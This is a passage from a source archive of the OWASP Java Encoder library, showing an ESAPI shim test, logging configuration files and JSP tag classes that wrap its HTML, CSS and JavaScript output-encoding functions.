owasp-java-encoder-1.2.3/esapi/src/site/site.xml000066400000000000000000000031421375203724500215340ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/esapi/src/test/000077500000000000000000000000001375203724500200615ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/esapi/src/test/java/000077500000000000000000000000001375203724500210025ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/esapi/src/test/java/org/000077500000000000000000000000001375203724500215715ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/esapi/src/test/java/org/owasp/000077500000000000000000000000001375203724500227225ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/esapi/src/test/java/org/owasp/encoder/000077500000000000000000000000001375203724500243415ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/esapi/src/test/java/org/owasp/encoder/esapi/000077500000000000000000000000001375203724500254425ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java000066400000000000000000000027451375203724500313160ustar00rootroot00000000000000
package org.owasp.encoder.esapi;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import junit.framework.Test;
import junit.framework.TestCase;
import junit.framework.TestSuite;
import org.owasp.esapi.ESAPI;
import org.owasp.esapi.Encoder;

/**
 * ESAPIEncoderTest
 *
 * @author jeffi
 */
public class ESAPIEncoderTest extends TestCase {
    public static Test suite() {
        return new TestSuite(ESAPIEncoderTest.class);
    }

    public void testEncode() throws Exception {
        // Note: the ESAPI reference encoder emits numeric entities for the same
        // input: "&#x3c;&#x3e;&#x26;&#x3a9;".  That's 25 characters to the
        // OWASP Java Encoder's 14 (named entities, and the non-ASCII letter
        // passed through unchanged because it is legal XML).
        assertEquals("&lt;&gt;&amp;\u03a9", ESAPI.encoder().encodeForXML("<>&\u03a9"));
    }

    public void testSerialization() throws Exception {
        // Note: the ESAPI reference implementation is NOT serializable.  Maybe
        // it will be in the future.  Our implementation is, however,
        // guaranteed serializable, and the enum singleton deserializes to the
        // very same instance.
        Encoder encoder = ESAPI.encoder();
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(encoder);
        oos.close();
        ObjectInputStream ois = new ObjectInputStream(
            new ByteArrayInputStream(baos.toByteArray()));
        Encoder deserializedEncoder = (Encoder) ois.readObject();
        assertSame(encoder, deserializedEncoder);
    }
}

owasp-java-encoder-1.2.3/esapi/src/test/resources/000077500000000000000000000000001375203724500220735ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/esapi/src/test/resources/.esapi/000077500000000000000000000000001375203724500232525ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/esapi/src/test/resources/.esapi/ESAPI.properties000066400000000000000000000041771375203724500262400ustar00rootroot00000000000000
# Properties based on ESAPI 2.2.1.1's configuration/esapi/ESAPI.properties file.
ESAPI.Encoder=org.owasp.encoder.esapi.ESAPIEncoder

# Log4JFactory Requires log4j.xml or log4j.properties in classpath - http://www.laliluna.de/log4j-tutorial.html
# Note that this is now considered deprecated!
#ESAPI.Logger=org.owasp.esapi.logging.log4j.Log4JLogFactory
# To use JUL, you need to obtain ESAPI's esapi-java-logging.properties and drop
# it somewhere into your class path. You can get it from the ESAPI configuration
# jar. (See Release 2.2.1.1 under GitHub for ESAPI/esapi-java-legacy.)
ESAPI.Logger=org.owasp.esapi.logging.java.JavaLogFactory
# To use the new SLF4J logger in ESAPI (see GitHub issue #129), set
#ESAPI.Logger=org.owasp.esapi.logging.slf4j.Slf4JLogFactory
# and do whatever other normal SLF4J configuration that you normally would do for your application.
# Note: The uncommented out ones are those needed for SLF4J. Others may be
# needed if you change the ESAPI logger.

#===========================================================================
# ESAPI Logging
# Set the application name if these logs are combined with other applications
Logger.ApplicationName=ESAPI-Shim-Test
# If you use an HTML log viewer that does not properly HTML escape log data, you can set LogEncodingRequired to true
Logger.LogEncodingRequired=false
# Determines whether ESAPI should log the application name. This might be clutter in some single-server/single-app environments.
Logger.LogApplicationName=true
# Determines whether ESAPI should log the server IP and port. This might be clutter in some single-server environments.
Logger.LogServerIP=false
# LogFileName, the name of the logging file. Provide a full directory path (e.g., C:\\ESAPI\\ESAPI_logging_file) if you
# want to place it in a specific directory.
#Logger.LogFileName=ESAPI_logging_file
# MaxLogFileSize, the max size (in bytes) of a single log file before it cuts over to a new one (default is 10,000,000)
#Logger.MaxLogFileSize=10000000
# Determines whether ESAPI should log the user info.
Logger.UserInfo=false
# Determines whether ESAPI should log the session id and client IP
Logger.ClientInfo=false

owasp-java-encoder-1.2.3/esapi/src/test/resources/esapi-java-logging.properties000066400000000000000000000005331375203724500276560ustar00rootroot00000000000000
handlers= java.util.logging.ConsoleHandler
.level= INFO
java.util.logging.ConsoleHandler.level = INFO
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
java.util.logging.SimpleFormatter.format=[%1$tF %1$tT] [%3$-7s] %5$s %n
#https://www.logicbig.com/tutorials/core-java-tutorial/logging/customizing-default-format.html

owasp-java-encoder-1.2.3/jsp/000077500000000000000000000000001375203724500160065ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/jsp/pom.xml000066400000000000000000000066721375203724500173300ustar00rootroot00000000000000
4.0.0 org.owasp.encoder encoder-parent 1.2.3 encoder-jsp jar JSP Encoder The OWASP Encoder JSP package contains JSP tag definitions and TLDs to allow easy use of the OWASP Encoder Project's core API. The TLDs contain both tag definitions and JSP EL functions.
org.owasp.encoder encoder ${project.parent.version} javax.servlet.jsp javax.servlet.jsp-api 2.2.1 provided javax.servlet javax.servlet-api 3.0.1 test org.springframework spring-test 5.1.3.RELEASE test org.springframework spring-core 5.1.3.RELEASE test

owasp-java-encoder-1.2.3/jsp/src/000077500000000000000000000000001375203724500165755ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/jsp/src/main/000077500000000000000000000000001375203724500175215ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/jsp/src/main/java/000077500000000000000000000000001375203724500204425ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/jsp/src/main/java/org/000077500000000000000000000000001375203724500212315ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/000077500000000000000000000000001375203724500223625ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/000077500000000000000000000000001375203724500240015ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/000077500000000000000000000000001375203724500245545ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java000066400000000000000000000042131375203724500276010ustar00rootroot00000000000000
// Copyright (c) 2012 Jeff Ichnowski
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
//     * Redistributions of source code must retain the above
//       copyright notice, this list of conditions and the following
//       disclaimer.
//
//     * Redistributions in binary form must reproduce the above
//       copyright notice, this list of conditions and the following
//       disclaimer in the documentation and/or other materials
//       provided with the distribution.
//
//     * Neither the name of the OWASP nor the names of its
//       contributors may be used to endorse or promote products
//       derived from this software without specific prior written
//       permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
// OF THE POSSIBILITY OF SUCH DAMAGE.

package org.owasp.encoder.tag;

import javax.servlet.jsp.tagext.SimpleTagSupport;

/**
 * The base class for the encoding tags within this package.
 *
 * @author Jeremy Long (jeremy.long@gmail.com)
 */
public abstract class EncodingTag extends SimpleTagSupport {
    /**
     * The value to be written out by the tag.
     */
    protected String _value;

    /**
     * Sets the value to be written out by the tag.
     * @param value the value to be written out by the tag.
     */
    public void setValue(String value) {
        this._value = value;
    }
}

owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java000066400000000000000000000041471375203724500273440ustar00rootroot00000000000000
// Copyright (c) 2012 Jeff Ichnowski
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
//     * Redistributions of source code must retain the above
//       copyright notice, this list of conditions and the following
//       disclaimer.
//
//     * Redistributions in binary form must reproduce the above
//       copyright notice, this list of conditions and the following
//       disclaimer in the documentation and/or other materials
//       provided with the distribution.
//
//     * Neither the name of the OWASP nor the names of its
//       contributors may be used to endorse or promote products
//       derived from this software without specific prior written
//       permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
// OF THE POSSIBILITY OF SUCH DAMAGE.

package org.owasp.encoder.tag;

import java.io.IOException;
import javax.servlet.jsp.JspException;
import org.owasp.encoder.Encode;

/**
 * A tag to perform encoding sufficient to place into a CDATA block.
 * This wraps {@link org.owasp.encoder.Encode#forCDATA(java.lang.String)},
 * writing the encoded value straight to the JSP output writer.
 *
 * @author Jeremy Long (jeremy.long@gmail.com)
 */
public class ForCDATATag extends EncodingTag {
    @Override
    public void doTag() throws JspException, IOException {
        Encode.forCDATA(getJspContext().getOut(), _value);
    }
}

owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java000066400000000000000000000041401375203724500304400ustar00rootroot00000000000000
// Copyright (c) 2012 Jeff Ichnowski
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
//     * Redistributions of source code must retain the above
//       copyright notice, this list of conditions and the following
//       disclaimer.
//
//     * Redistributions in binary form must reproduce the above
//       copyright notice, this list of conditions and the following
//       disclaimer in the documentation and/or other materials
//       provided with the distribution.
//
//     * Neither the name of the OWASP nor the names of its
//       contributors may be used to endorse or promote products
//       derived from this software without specific prior written
//       permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
// OF THE POSSIBILITY OF SUCH DAMAGE.
package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform CSS encoding for CSS strings. * This wraps the {@link org.owasp.encoder.Encode#forCssString(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForCssStringTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forCssString(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java000066400000000000000000000041341375203724500277370ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform CSS encoding for CSS URL contexts. * This wraps the {@link org.owasp.encoder.Encode#forCssUrl(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForCssUrlTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forCssUrl(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java000066400000000000000000000041661375203724500313210ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. 
// // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform HTML encoding for HTML text attributes. * This wraps the {@link org.owasp.encoder.Encode#forHtmlAttribute(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlAttributeTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forHtmlAttribute(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java000066400000000000000000000041501375203724500307610ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. 
// // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform HTML encoding for text content. * This wraps the {@link org.owasp.encoder.Encode#forHtmlContent(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlContentTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forHtmlContent(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java000066400000000000000000000041021375203724500274230ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. 
// // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform HTML encoding. * This wraps the {@link org.owasp.encoder.Encode#forHtml(java.lang.String)}. 
* * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forHtml(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java000066400000000000000000000042311375203724500330370ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. 
package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform HTML Attribute encoding for an unquoted attribute. * This wraps the {@link org.owasp.encoder.Encode#forHtmlUnquotedAttribute(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlUnquotedAttributeTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forHtmlUnquotedAttribute(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java000066400000000000000000000041771375203724500324650ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform JavaScript Attribute encoding. * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptAttribute(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptAttributeTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forJavaScriptAttribute(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java000066400000000000000000000041571375203724500315520ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. 
// // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform JavaScript Block encoding. * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptBlock(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptBlockTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forJavaScriptBlock(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java000066400000000000000000000041631375203724500317550ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. 
// // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform JavaScript Source encoding. * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptSource(java.lang.String)}. 
